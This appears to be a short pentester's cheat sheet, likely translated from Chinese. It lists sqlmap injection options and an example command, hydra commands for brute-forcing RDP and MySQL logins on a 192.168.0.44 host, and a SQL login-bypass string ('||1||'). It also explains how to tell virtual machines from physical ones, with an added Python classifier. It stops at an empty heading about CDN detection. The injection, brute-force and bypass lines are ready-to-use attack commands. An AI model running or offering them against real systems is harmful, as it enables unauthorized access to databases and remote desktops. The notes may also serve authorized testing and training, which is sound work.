One, sqlmap
-p specifies the injection point
--technique specifies the injection technique(s) to use
B: Boolean-based blind
E: Error-based
U: UNION query-based
S: Stacked queries (multiple statements in one request)
T: Time-based blind (based on time delay)
Q: Inline queries (nested queries)
--proxy=http://127.0.0.1:8080
--batch
Oracle's default port number is 1521
e.g. py -2 sqlmap.py -r C:\Users\HP\Desktop\1.txt --proxy=http://127.0.0.1:8080 -p zkzh --batch
-u "<URL>": it is best to wrap the URL in double quotes
Two, brute-forcing 3389
hydra 192.168.0.44 rdp -L user.txt -P pass.txt
hydra 192.168.0.44 -l root -P pass.txt mysql -t 3 -v -f
-f stops after the first valid password is found
Three, universal password
Relies on operator execution precedence in the T-SQL language
'||1||'
Four, determine whether it is a virtual machine
Windows: systeminfo
Physical machine:
系统制造商: To be filled by O.E.M.
系统型号: To be filled by O.E.M.
Virtual machine:
系统制造商: VMware, Inc.
系统型号: VMware Virtual Platform
Linux: dmidecode -s system-product-name (note: root permission is required)
Physical machine: RH2288H V3
Virtual machine: VMware Virtual Platform
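The check above as an added Python example, not part of the original notes: it parses captured systeminfo output (English or Chinese labels) or a dmidecode product name and looks for hypervisor strings. Only the VMware values come from the notes; the other markers and the sample host name are assumptions, and because a hypervisor can present custom DMI strings, a missing marker is only weak evidence of physical hardware.

```python
# Added example: classify systeminfo / dmidecode output as virtual or physical.
# Only the VMware strings come from the notes; the other markers are
# assumptions based on commonly seen DMI values.
MODEL_MARKERS = ("vmware", "virtualbox", "virtual machine", "kvm", "hvm domu")
MANUFACTURER_PREFIXES = ("vmware", "innotek", "qemu", "xen")

# systeminfo labels are localized; English and Simplified Chinese are mapped.
LABELS = {
    "system manufacturer": "manufacturer",
    "系统制造商": "manufacturer",
    "system model": "model",
    "系统型号": "model",
}


def parse_systeminfo(text):
    """Extract the manufacturer and model fields from systeminfo output."""
    fields = {}
    for line in text.replace("：", ":").splitlines():  # tolerate full-width colon
        key, sep, value = line.partition(":")
        name = LABELS.get(key.strip().lower())
        if sep and name:
            fields[name] = value.strip()
    return fields


def classify(manufacturer="", model=""):
    """Return 'virtual' when a hypervisor marker is present, else 'likely-physical'.

    For dmidecode -s system-product-name, pass the output as model only.
    The manufacturer "Microsoft Corporation" is deliberately not a marker:
    Hyper-V guests are matched by the model "Virtual Machine" instead,
    so Microsoft-built physical hardware is not misclassified.
    """
    man, mod = manufacturer.strip().lower(), model.strip().lower()
    if man.startswith(MANUFACTURER_PREFIXES) or any(m in mod for m in MODEL_MARKERS):
        return "virtual"
    return "likely-physical"


# Constructed samples built from the values shown in the notes.
SYSTEMINFO_VM = "主机名: HOST-A\n系统制造商: VMware, Inc.\n系统型号: VMware Virtual Platform\n"
SYSTEMINFO_PHYSICAL = "系统制造商: To be filled by O.E.M.\n系统型号: To be filled by O.E.M.\n"

if __name__ == "__main__":
    for sample in (SYSTEMINFO_VM, SYSTEMINFO_PHYSICAL):
        print(classify(**parse_systeminfo(sample)))
    print(classify(model="RH2288H V3"))
```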
Five, determine whether there is a CDN